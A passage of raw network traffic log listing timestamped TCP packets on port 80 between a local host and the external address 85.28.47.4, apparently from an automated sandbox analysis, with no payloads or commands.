Jul 3, 2024 18:08:24.852926970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852937937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852948904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852962971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852967024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.852974892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852993965 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.853018999 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.853029966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.853040934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.853120089 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.853168011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.853178978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.853188038 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.853198051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.853208065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.853219032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.853225946 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.853229046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.853244066 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.853269100 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.853406906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.853418112 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.853467941 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858042002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858062029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858071089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858089924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858103991 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858119965 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858154058 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858172894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858184099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858196020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858221054 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858222008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858247995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858273983 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858354092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858406067 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858408928 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858421087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858453035 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858510971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858521938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858531952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858566046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858566046 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858592033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858594894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858618975 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858632088 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858707905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858719110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858730078 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858753920 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858773947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858791113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858791113 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858803034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858813047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.858820915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858838081 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858853102 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.858992100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859004021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859014034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859042883 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859050035 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859054089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859072924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859095097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859107018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859107018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859117031 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859137058 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859153986 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859177113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859206915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859220028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859225988 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859247923 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859257936 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859273911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859286070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859322071 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859340906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859353065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859422922 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859426022 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859453917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859463930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859474897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859508991 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859536886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859548092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859559059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859581947 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859594107 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859688044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859698057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859718084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859729052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859735966 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859740019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859762907 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859776020 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859829903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859841108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859852076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859884977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859903097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859909058 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859915018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859925985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859940052 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859946012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.859962940 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.859989882 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.860022068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.860034943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.860045910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.860058069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.860066891 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.860093117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.860095978 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.860136032 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.938884974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.938963890 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.939040899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939053059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939064026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939094067 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.939129114 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939135075 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.939141035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939152002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939163923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939186096 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.939210892 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.939487934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939543962 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.939630032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939640045 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939681053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.939694881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939706087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939717054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939728975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939742088 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.939763069 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.939788103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.939794064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.939836025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.955118895 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955188990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955212116 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.955228090 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.955368996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955411911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955421925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955426931 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.955449104 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.955466032 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.955534935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955547094 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955558062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955581903 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.955610991 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.955615044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955657005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.955686092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955698013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955739021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.955751896 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.955777884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955789089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955802917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955813885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955828905 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.955852032 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.955928087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955940008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955950975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.955981970 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.955992937 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956032991 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956043959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956054926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956084967 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956110001 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956120968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956132889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956163883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956173897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956257105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956269026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956279039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956290960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956301928 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956311941 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956314087 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956347942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956347942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956423998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956466913 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956475019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956495047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956505060 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956530094 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956541061 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956614017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956625938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956635952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956646919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956656933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956671953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956692934 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956753969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956764936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956808090 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956840992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956852913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956864119 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956876040 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956887007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.956904888 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.956924915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.957076073 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957087040 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957097054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957108974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957119942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957130909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957142115 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.957154989 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.957173109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.957321882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957334995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957345009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957355976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957367897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957376957 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.957377911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957391024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957406998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.957438946 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.957556963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957567930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957577944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957587957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957633018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.957644939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.957709074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957720041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957731009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957760096 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.957771063 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.957818985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957830906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957840919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957851887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957860947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957870960 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.957873106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957884073 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957895041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957904100 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.957906008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.957936049 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.957947016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.958106041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958168030 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.958218098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958230019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958240986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958251953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958262920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958272934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958272934 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.958306074 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.958317041 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.958508015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958523989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958534002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958544970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958554983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958564997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958575964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958580017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.958585978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958596945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958606958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.958619118 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.958640099 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.959146023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.959156990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.959173918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.959183931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.959193945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.959203959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.959213018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.959213972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.959223986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.959234953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.959234953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.959247112 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.959255934 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.959258080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.959269047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.959273100 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.959291935 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.959307909 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.027712107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.027736902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.027748108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.027762890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.027775049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.027785063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.027796984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.027829885 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.027872086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.027882099 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.027918100 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.028445005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.028455973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.028467894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.028512001 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.028522968 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.028644085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.028655052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.028664112 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.028682947 CEST	80	49710	85.28.47.4	192.168.2.6
